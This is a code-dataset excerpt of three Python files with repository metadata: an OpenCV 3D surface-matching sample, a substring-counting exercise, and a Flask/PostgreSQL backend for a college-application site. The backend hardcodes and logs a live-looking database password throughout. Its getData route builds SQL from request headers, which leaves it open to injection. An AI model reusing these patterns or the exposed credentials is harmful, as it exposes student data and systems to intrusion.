] | 7,158 | 2016-07-04T22:19:27.000Z | 2022-03-31T07:54:32.000Z | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
] | 2,184 | 2016-07-05T12:04:14.000Z | 2022-03-30T19:10:12.000Z | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
] | 5,535 | 2016-07-06T12:01:10.000Z | 2022-03-31T03:13:24.000Z | import cv2 as cv
N = 2
modelname = "parasaurolophus_6700"
scenename = "rs1_normals"
detector = cv.ppf_match_3d_PPF3DDetector(0.025, 0.05)
print('Loading model...')
pc = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % modelname, 1)
print('Training...')
detector.trainModel(pc)
print('Loading scene...')
pcTest = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % scenename, 1)
print('Matching...')
results = detector.match(pcTest, 1.0/40.0, 0.05)
print('Performing ICP...')
icp = cv.ppf_match_3d_ICP(100)
_, results = icp.registerModelToScene(pc, pcTest, results[:N])
print("Poses: ")
for i, result in enumerate(results):
#result.printPose()
print("\n-- Pose to Model Index %d: NumVotes = %d, Residual = %f\n%s\n" % (result.modelIndex, result.numVotes, result.residual, result.pose))
if i == 0:
pct = cv.ppf_match_3d.transformPCPose(pc, result.pose)
cv.ppf_match_3d.writePLY(pct, "%sPCTrans.ply" % modelname)
| 28.424242 | 145 | 0.695096 | import cv2 as cv
N = 2
modelname = "parasaurolophus_6700"
scenename = "rs1_normals"
detector = cv.ppf_match_3d_PPF3DDetector(0.025, 0.05)
print('Loading model...')
pc = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % modelname, 1)
print('Training...')
detector.trainModel(pc)
print('Loading scene...')
pcTest = cv.ppf_match_3d.loadPLYSimple("data/%s.ply" % scenename, 1)
print('Matching...')
results = detector.match(pcTest, 1.0/40.0, 0.05)
print('Performing ICP...')
icp = cv.ppf_match_3d_ICP(100)
_, results = icp.registerModelToScene(pc, pcTest, results[:N])
print("Poses: ")
for i, result in enumerate(results):
#result.printPose()
print("\n-- Pose to Model Index %d: NumVotes = %d, Residual = %f\n%s\n" % (result.modelIndex, result.numVotes, result.residual, result.pose))
if i == 0:
pct = cv.ppf_match_3d.transformPCPose(pc, result.pose)
cv.ppf_match_3d.writePLY(pct, "%sPCTrans.ply" % modelname)
| 0 | 0 | 0 |
fb883d65257d272c5c48ac4e22c85acfe29b1412 | 530 | py | Python | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | jaswinder9051998/Resources | fd468af37bf24ca57555d153ee64693c018e822e | [
"MIT"
] | 101 | 2021-12-20T11:57:11.000Z | 2022-03-23T09:49:13.000Z | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | Sid-1164/Resources | 3987dcaeddc8825f9bc79609ff26094282b8ece1 | [
"MIT"
] | 4 | 2022-01-12T11:55:56.000Z | 2022-02-12T04:53:33.000Z | Programming Languages/Python/Theory/100_Python_Challenges/Section_2_String/40. number of occurrences of a sub-string in a given string.py | Sid-1164/Resources | 3987dcaeddc8825f9bc79609ff26094282b8ece1 | [
"MIT"
] | 38 | 2022-01-12T11:56:16.000Z | 2022-03-23T10:07:52.000Z | """
Write a function that finds the number of times a sub-string occurs in a given string and
also the position (index number) at which the sub-string is found.
Example:
main_string = 'Let it be, let it be, let it be'
sub_string = 'let it be'
Expected output:
number of times sub-string occurs = 2, position =[11, 22]
""" | 26.5 | 90 | 0.718868 | """
Write a function that finds the number of times a sub-string occurs in a given string and
also the position (index number) at which the sub-string is found.
Example:
main_string = 'Let it be, let it be, let it be'
sub_string = 'let it be'
Expected output:
number of times sub-string occurs = 2, position =[11, 22]
"""
def find_substring(main_string, sub_string):
value = main_string.count(sub_string)
res = [i for i in range(len(main_string)) if main_string.startswith(sub_string, i)]
return value, res | 180 | 0 | 23 |
0f2b54f50167602d747ac94e7fd1ca663512b1d1 | 40,062 | py | Python | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | 1 | 2018-09-13T02:03:04.000Z | 2018-09-13T02:03:04.000Z | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | 5 | 2018-09-30T04:57:45.000Z | 2020-07-07T19:37:20.000Z | app.py | CollegeAppIO/CollegeAppIO | 266032ba23e0f758a751f3d9008ce4a54bf5c8c7 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request, render_template, redirect
from flask_cors import CORS, cross_origin
from flask_restful import Resource, Api
from json import dumps
from flask_jsonpify import jsonify
import psycopg2
import jinja2
import json, ast
from sendgrid.helpers.mail import *
from flask_mail import Mail, Message
import boto3, botocore
import logistic_reg as model
from werkzeug.utils import secure_filename
from io import BytesIO
import io
import base64
app = Flask(__name__)
api = Api(app)
CORS(app)
#comment
conn, cur = initDB()
import os
@app.route("/")
@app.route("/dbinfo")
api.add_resource(Students, '/students/<id>/<adbool>')
@app.route("/postResponse", methods = ['POST'])
@app.route("/addCollegeQuestions", methods = ['GET'])
@app.route("/removeWatchList", methods = ['GET'])
@app.route("/getWatchList", methods = ['GET'])
@app.route("/addWatchList", methods = ['GET'])
@app.route("/getApplicationPool")
@app.route("/addAdmin", methods = ['POST'])
@app.route("/getQuestions", methods = ['GET'])
@app.route("/getStudentResponse", methods = ['GET'])
@app.route("/getCategories", methods=['GET'])
@app.route("/getData", methods = ['GET'])
@app.route("/getCollegeStatsMajor", methods=['GET'])
@app.route("/getCollegeCountMajor", methods=['GET'])
@app.route("/getCollegeCountSex", methods=['GET'])
@app.route("/getCollegeCountRace", methods=['GET'])
@app.route("/getCollegeStats", methods = ['GET'])
@app.route("/getCollegeInfo", methods = ['GET'])
@app.route("/getColleges", methods = ['GET'])
@app.route("/getrecommendedColleges", methods = ['GET'])
# using SendGrid's Python Library
# https://github.com/sendgrid/sendgrid-python
# import sendgrid
# import os
# from sendgrid.helpers.mail import *
# sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
# from_email = Email("sanatmouli@gmail.com")
# to_email = Email("sanatmouli@gmail.com")
# subject = "Sending with SendGrid is Fun"
# content = Content("text/plain", "and easy to do anywhere, even with Python")
# mail = Mail(from_email, subject, to_email, content)
# response = sg.client.mail.send.post(request_body=mail.get())
# print(response.status_code)
# print(response.body)
# print(response.headers)
@app.route("/sendEmail/<email_id>/<collegename>", methods = ['GET'])
@app.route("/sendEmailtoStudent/<email_id>/<fname>", methods = ['GET'])
#@app.route("/sendEmailAccept/<email_id>/<collegename>/<studentname>", methods = ['GET'])
#@app.route("/sendEmailReject/<email_id>/<collegename>/<studentname>", methods = ['GET'])
@app.route("/sendEmailStatus/<email_id>/<collegename>/<studentid>/<accept_status>", methods = ['GET'])
@app.route("/putStudents", methods = ['POST'])
@app.route("/getStudents/<uid>", methods = ['GET'])
@app.route("/setCollegeDetails/<collegename>", methods = ['POST'])
@app.route("/setCollegeQuestions/<collegename>", methods = ['POST'])
@app.route("/getCollegeName", methods = ['GET'])
@app.route("/getIDType/<sid>", methods=['GET'])
@app.route("/getCollegeNameForUID/<uid>", methods=['GET'])
@app.route("/getStudentsForCollegeName/<collegename>", methods=['GET'])
@app.route("/getListOfAcceptedStudents/<collegename>", methods=['GET'])
@app.route("/getStatsEachStudent", methods=['GET'])
@app.route("/getCollegeStatsEachMajor", methods=['GET'])
@app.route("/postImage", methods=['POST'])
#@cross_origin(origin='http://localhost:4200',headers=['Content-Type','Authorization','Access-Control-Allow-Origin','Access-Control-Allow-Methods'])
if __name__ == '__main__':
conn, cur = initDB()
app.run(debug=True)
| 30.864407 | 249 | 0.683565 | from flask import Flask, request, render_template, redirect
from flask_cors import CORS, cross_origin
from flask_restful import Resource, Api
from json import dumps
from flask_jsonpify import jsonify
import psycopg2
import jinja2
import json, ast
from sendgrid.helpers.mail import *
from flask_mail import Mail, Message
import boto3, botocore
import logistic_reg as model
from werkzeug.utils import secure_filename
from io import BytesIO
import io
import base64
app = Flask(__name__)
api = Api(app)
CORS(app)
#comment
def initDB():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = psycopg2.connect(conn_string)
curr = conn.cursor()
print ("Connected!")
return conn, curr
conn, cur = initDB()
import os
def initEmailService():
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = os.environ['MAIL_USERNAME']
app.config['MAIL_PASSWORD'] = os.environ['MAIL_PASSWORD']
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
return mail
@app.route("/")
def hello():
return jsonify("Hello World and DB!!")
@app.route("/dbinfo")
def dbinfo():
conn, cur = initDB()
info = "Con: " + str (conn) + "Curr: " + str(cur)
return jsonify(info)
class Students(Resource):
def get (self, id, adbool):
print('id, adbool: ' + id + " " + adbool)
conn, curr = initDB()
bools = int(adbool)
if bools == 0:
query = "INSERT INTO students (studentid) VALUES (%s)"
else:
query = "INSERT INTO admin (admin_id) VALUES (%s)"
curr.execute(query, (id, ))
conn.commit()
curr.close()
return jsonify("OKKK")
api.add_resource(Students, '/students/<id>/<adbool>')
@app.route("/postResponse", methods = ['POST'])
def postResponse():
con = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
con = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
text = ast.literal_eval(json.dumps(request.get_json()))
studentid = text['studentid']
collegeName = text['collegeName']
questions = []
if 'questions' in text:
questions = text['questions'].split("||")
appliedStatus = text['appliedStatus']
major = ""
if 'major' in text:
major = text['major']
curs = con.cursor()
curs2 = con.cursor()
curs3 = con.cursor()
collegeN = (collegeName, )
curs.execute("SELECT collegeid FROM COLLEGES WHERE collegename = %s", collegeN)
result = []
for row in curs:
obj = {
'collegeid' : row
}
result.append(obj)
print result
collegeid = result[0]['collegeid']
results = checkUser(studentid, collegeid)
print results
if (len(results) == 0):
acceptancestatus = 0
query = "INSERT INTO current_application (studentid, collegeid, acceptancestatus, questions, appliedStatus, major) VALUES (%s, %s, %s, %s, %s, %s)"
curs2.execute(query, (studentid, result[0]['collegeid'], acceptancestatus, questions, appliedStatus, major, ))
else:
tup = ()
for i in range(0, len(questions)):
tup = tup + (questions[i], )
query_u = "UPDATE current_application SET questions = %s WHERE studentid = %s AND collegeid = %s"
curs3.execute(query_u, (questions, studentid, collegeid, ))
query = "UPDATE current_application SET (appliedStatus, major) = (%s, %s) WHERE studentid = %s AND collegeid = %s"
curs2.execute(query, (appliedStatus, major, studentid, collegeid, ))
con.commit()
curs.close()
curs2.close()
curs3.close()
return jsonify("200")
finally:
if con:
con.close()
def checkUser(studentid, collegeid):
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
con = None
try :
con = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs1 = con.cursor()
curs1.execute("SELECT applicationid FROM current_application WHERE collegeid = %s AND studentid = %s", (collegeid, studentid, ))
results = []
for rows in curs1:
objs = {
'applicationid' : rows
}
results.append(objs)
con.commit()
curs1.close()
return results
finally:
if con:
con.close()
@app.route("/addCollegeQuestions", methods = ['GET'])
def addCollegeQuestions():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
curs1 = conn.cursor()
college = (request.headers.get('collegeName'), )
question = request.headers.get('question')
questions = question.split("||")
query = (questions, college, )
curs1.execute("UPDATE colleges SET questions = %s WHERE collegename = %s ", query)
conn.commit()
curs.close()
curs1.close()
response = jsonify("200")
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/removeWatchList", methods = ['GET'])
def removeWatchList():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
curs1 = conn.cursor()
studentid = request.headers.get('studentid')
college = request.headers.get('collegename')
studid = (studentid, )
curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
result = []
for row in curs:
obj = {
'watchlist': row
}
if obj['watchlist'][0] is not None:
result = obj['watchlist'][0]
if (len(result) == 0):
response = jsonify("NO WATCHLIST FOUND")
else:
print college
query = (college, studentid, )
print query
curs1.execute("UPDATE students SET watchlist = array_remove(watchlist, %s) WHERE studentid = %s", query)
conn.commit()
curs1.close()
curs.close()
response = jsonify("200")
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getWatchList", methods = ['GET'])
def getWatchList():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
studentid = request.headers.get('studentid')
studid = (studentid, )
curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
result = []
for row in curs:
obj = {
'watchlist': row
}
if obj['watchlist'][0] is not None:
result = obj['watchlist'][0]
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/addWatchList", methods = ['GET'])
def addWatchList():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
curs1 = conn.cursor()
college = request.headers.get('collegeName')
studentid = request.headers.get('studentid')
print studentid
studid = (studentid, )
curs.execute("SELECT watchlist FROM students WHERE studentid = %s", studid)
result = []
for row in curs:
obj = {
'watchlist' : row
}
if obj['watchlist'][0] is not None:
result = obj['watchlist'][0]
print result
if (len(result) == 0):
colleges = []
colleges.append(college)
query = (colleges, studentid, )
curs1.execute("UPDATE students SET watchlist = %s WHERE studentid = %s ", query)
else:
colleges = result
colleges.append(college)
query = (colleges, studentid, )
curs1.execute("UPDATE students SET watchlist = %s WHERE studentid = %s ", query)
conn.commit()
curs.close()
curs1.close()
response = jsonify("200")
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getApplicationPool")
def getApplicationPool():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
curs1 = conn.cursor()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
curs.execute("SELECT collegeid FROM colleges WHERE collegeName = %s", collegeN)
result = []
for row in curs:
obj = {
'collegeid' : row
}
result.append(obj)
print result
collegeid = result[0]['collegeid']
curs1.execute("SELECT students.studentid, major, act, sat, gpa FROM current_application, students WHERE collegeid = %s AND acceptancestatus = 0 AND students.studentid = current_application.studentid", collegeid)
result = []
for row in curs1:
obj = {
'studentid' : row[0],
'major' : row[1],
'act' : row[2],
'sat' : row[3],
'gpa' : row[4]
}
result.append(obj)
print result
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
curs1.close()
return response
finally:
if conn:
conn.close()
@app.route("/addAdmin", methods = ['POST'])
def addAdmin():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = None
try :
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs1 = conn.cursor()
text = ast.literal_eval(json.dumps(request.get_json()))
admin_id = text['adminid']
collegeName = text['collegeName']
res = checkAdminUser(admin_id, collegeName)
res_college = checkCollege(collegeName)
print res
response = None
if (len(res_college) == 0):
print "College Does Not Exist"
res_id = getCollegeid()
collegeid = int(res_id[0]['collegeid'][0]) + 1
curs1.execute("INSERT INTO colleges (collegeid, collegename) VALUES (%s, %s)", (collegeid, collegeName, ))
if (len(res) > 0):
response = jsonify("Admin User Exists")
else:
curs1.execute("INSERT INTO admin (admin_id, college) VALUES (%s, %s)", (admin_id, collegeName ))
response = jsonify("Added Admin User")
response.status_code = 200
conn.commit()
curs1.close()
return response
finally:
if conn:
conn.close()
def getCollegeid():
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
con = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs1 = con.cursor()
curs1.execute("SELECT collegeid FROM colleges ORDER BY collegeid DESC LIMIT 1")
results = []
for rows in curs1:
objs = {
'collegeid' : rows
}
results.append(objs)
print results
con.commit()
curs1.close()
return results
def checkCollege(collegeName):
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
con = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs1 = con.cursor()
curs1.execute("SELECT collegeName FROM colleges WHERE collegeName = %s", (collegeName, ))
results = []
for rows in curs1:
objs = {
'collegeName' : rows
}
results.append(objs)
con.commit()
curs1.close()
return results
def checkAdminUser(adminid, collegeName):
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
con = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs1 = con.cursor()
curs1.execute("SELECT admin_fname, admin_lname FROM admin WHERE admin_id = %s AND college = %s", (adminid, collegeName, ))
results = []
for rows in curs1:
objs = {
'admin_fname' : rows[0],
'admin_lname' : rows[1]
}
results.append(objs)
con.commit()
curs1.close()
return results
@app.route("/getQuestions", methods = ['GET'])
def getQuestions():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
print ("Connecting to database\n ->%s" % (conn_string))
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
curs.execute("SELECT questions FROM colleges WHERE collegeName = %s", collegeN)
result = []
for row in curs:
obj = {
'questions' : row[0]
}
result = obj['questions']
print result
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/getStudentResponse", methods = ['GET'])
def getStudentResponse():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
print ("Connecting to database\n ->%s" % (conn_string))
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
curs1 = conn.cursor()
curs2 = conn.cursor()
studentid = request.headers.get('studentid')
collegeName = request.headers.get('collegeName')
print "collegeName: ", collegeName
collegeN = (collegeName, )
curs1.execute("SELECT collegeid FROM colleges WHERE collegeName = %s", collegeN)
result = []
for row in curs1:
obj = {
'collegeid' : row[0]
}
result.append(obj)
collegeid = result[0]['collegeid']
collegeN = (collegeid, studentid, )
print "collegeN: ", collegeN
curs.execute("SELECT appliedStatus FROM current_application WHERE collegeid = %s and studentid = %s", collegeN)
result = []
for row in curs:
obj = {
'appliedStatus' : row[0],
}
result.append(obj)
print result
appliedStatus = 2
if (len(result) > 0):
appliedStatus = int(result[0]['appliedStatus'])
print "appliedStatus: ", appliedStatus
if (int(appliedStatus) == 2):
response = jsonify("Student Not Found")
if (int(appliedStatus) == 1):
response = jsonify("Student Already Applied")
if (int(appliedStatus) == 0):
curs2.execute("SELECT questions, major FROM current_application WHERE collegeid = %s and studentid = %s", collegeN)
result = []
for row in curs2:
obj = {
'questions' : row[0],
'major' : row[1]
}
result.append(obj)
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
curs1.close()
curs2.close()
return response
finally:
if conn:
conn.close()
@app.route("/getCategories", methods=['GET'])
def getCategories():
try:
con, curs = initDB()
query = "SELECT column_name from INFORMATION_SCHEMA.COLUMNS where table_name = 'historicalapplication' AND column_name != 'historicalid'"
curs.execute(query)
result = []
for row in curs:
obj = {
'categories': row[0]
}
result.append(obj)
print result
response = jsonify(result)
print result
response.status_code = 200
con.commit()
curs.close
return response
finally:
if con:
con.close()
@app.route("/getData", methods = ['GET'])
def getData():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
print ("Connecting to database\n ->%s" % (conn_string))
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
collegeName = request.headers.get('collegeName')
param1 = request.headers.get('param1')
param2 = request.headers.get('param2')
variables = request.headers.get('vars')
quals = request.headers.get('qualitative')
list_quals = []
list_vars = []
if variables != "":
list_vars = variables.split("||")
list_quals = quals.split("||")
collegeN = (collegeName, )
query = "SELECT " + param1 + ", " + param2 + ", decision FROM historicalapplication WHERE college = %s"
for i in range(0, len(list_quals)):
qual_var = list_quals[i]
if qual_var == "Male":
qual_var = 1
elif qual_var == "Female":
qual_var = 0
query = query + " and " + list_vars[i] + " = %s"
collegeN = collegeN + (str(qual_var), )
curs.execute(query, collegeN)
result = []
result1 = []
result2 = []
result3 = []
for row in curs:
obj = {
'param1': float(row[0]),
}
obj1 = {
'param2': float(row[1])
}
obj2 = {
'decision': row[2]
}
result1.append(obj)
result2.append(obj1)
result3.append(obj2)
result.append(result1)
result.append(result2)
result.append(result3)
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeStatsMajor", methods=['GET'])
def getCollegeStatsMajor():
conn = None
try:
result = []
conn, cur = initDB()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
cur.execute("SELECT major, AVG(act), AVG(sat), AVG(num_ap), AVG(gpa) FROM historicalapplication where college = %s GROUP BY major", collegeN)
for row in cur:
obj = {
'major' : row[0],
'act' : float(row[1]),
'sat' : float(row[2]),
'num_ap' : float(row[3]),
'gpa' : float(row[4]),
}
result.append(obj)
conn.commit()
cur.close()
response = jsonify(result)
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeCountMajor", methods=['GET'])
def getCollegeCounts():
conn = None
try:
result = []
conn, cur = initDB()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
cur.execute("SELECT major, COUNT(major)FROM historicalapplication where college = %s GROUP BY college, major", collegeN)
for row in cur:
obj = {
'Major' : row[0],
'Count' : float(row[1])
}
result.append(obj)
conn.commit()
cur.close()
response = jsonify(result)
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeCountSex", methods=['GET'])
def getCollegeCountSex():
conn = None
try:
result = []
conn, cur = initDB()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
cur.execute("SELECT sex, COUNT(sex) FROM historicalapplication where college = %s GROUP BY college, sex", collegeN)
for row in cur:
obj = {
'Sex' : row[0],
'Count' : float(row[1])
}
result.append(obj)
conn.commit()
cur.close()
response = jsonify(result)
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeCountRace", methods=['GET'])
def getCollegeCountRace():
conn = None
try:
result = []
conn, cur = initDB()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
cur.execute("SELECT race, COUNT(race)FROM historicalapplication where college = %s GROUP BY college, race", collegeN)
for row in cur:
obj = {
'Race' : row[0],
'Count' : float(row[1])
}
result.append(obj)
conn.commit()
cur.close()
response = jsonify(result)
response.status_code = 200
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeStats", methods = ['GET'])
def getCollegeStats():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
print ("Connecting to database\n ->%s" % (conn_string))
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
curs.execute("SELECT college, avg(act), avg(sat), avg(num_ap), avg(gpa) FROM historicalapplication where college = %s GROUP BY college", collegeN)
result = []
for row in curs:
obj = {
'college': row[0],
'act': float(row[1]),
'sat': float(row[2]),
'num_ap': float(row[3]),
'gpa': float(row[4])
}
result.append(obj)
result2 = []
curs2 = conn.cursor()
curs2.execute("SELECT race, count(race) FROM historicalapplication where college = %s GROUP BY race", collegeN)
for row in curs2:
obj = {
'race' : row[0],
'count' : float(row[1])
}
result2.append(obj)
result.append(result2)
result3 = []
curs3 = conn.cursor()
curs3.execute("SELECT CASE WHEN sex = '1' then 'Female' WHEN sex = '0' then 'Other' WHEN sex = '2' then 'Male' END AS SEX, count(sex) FROM historicalapplication where college = %s GROUP BY sex", collegeN)
for row in curs3:
obj = {
'sex' : row[0],
'count' : float(row[1])
}
result3.append(obj)
result.append(result3)
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/getCollegeInfo", methods = ['GET'])
def getCollegesInfo():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
print ("Connecting to database\n ->%s" % (conn_string))
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
collegeName = request.headers.get('collegeName')
collegeN = (collegeName, )
curs.execute("SELECT information, tuition_in, tuition_out, school_locat, a_calender, num_students, num_ugrads, num_postgrads, found_year, telephone, deadlines, stud_fac, yr_grad, image_link FROM COLLEGES WHERE collegename = %s", collegeN)
result = []
for row in curs:
obj = {
'information' : row[0],
'tuition_in' : row[1],
'tuition_out' : row[2],
'school_locat' : row[3],
'a_calender' : row[4],
'num_students' : row[5],
'num_ugrads' : row[6],
'num_postgrads' : row[7],
'found_year' : row[8],
'telephone' : row[9],
'deadlines' : row[10],
'stud_fac' : row[11],
'yr_grad' : row[12],
'image_link' : row[13],
}
result.append(obj)
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/getColleges", methods = ['GET'])
def getColleges():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = psycopg2.connect(conn_string)
print ("Connecting to database\n ->%s" % (conn_string))
curs = conn.cursor()
curs.execute("SELECT collegename, image_link FROM COLLEGES")
result = []
for row in curs:
obj = {
'collegename' : row[0],
'image_link' : row[1]
}
result.append(obj)
response = jsonify(result)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
@app.route("/getrecommendedColleges", methods = ['GET'])
def getrecommendedColleges():
conn = None
try:
conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
conn = psycopg2.connect(conn_string)
curs = conn.cursor()
uid = request.headers.get("studentid")
result = model.main(uid)
results = []
if result == "Finish Application":
curs.execute("SELECT collegename, image_link FROM COLLEGES")
for row in curs:
obj = {
'collegename' : row[0],
'image_link' : row[1]
}
results.append(obj)
else:
for i in range(0, len(result)):
print result
college = result[i]
collegeName = (result[i], )
curs.execute("SELECT image_link FROM COLLEGES WHERE collegename = %s", collegeName)
for row in curs:
obj = {
'collegename' : college,
'image_link' : row[0]
}
results.append(obj)
response = jsonify(results)
response.status_code = 200
conn.commit()
curs.close()
return response
finally:
if conn:
conn.close()
def insertIntoDB(tablename, keyval, conn, cursor):
columns = ','.join (k for k in keyval)
placeholder = ','.join( "%s" for k in keyval)
query = "INSERT INTO " + tablename + " (" + columns + ") VALUES (" + placeholder + ")"
print (query)
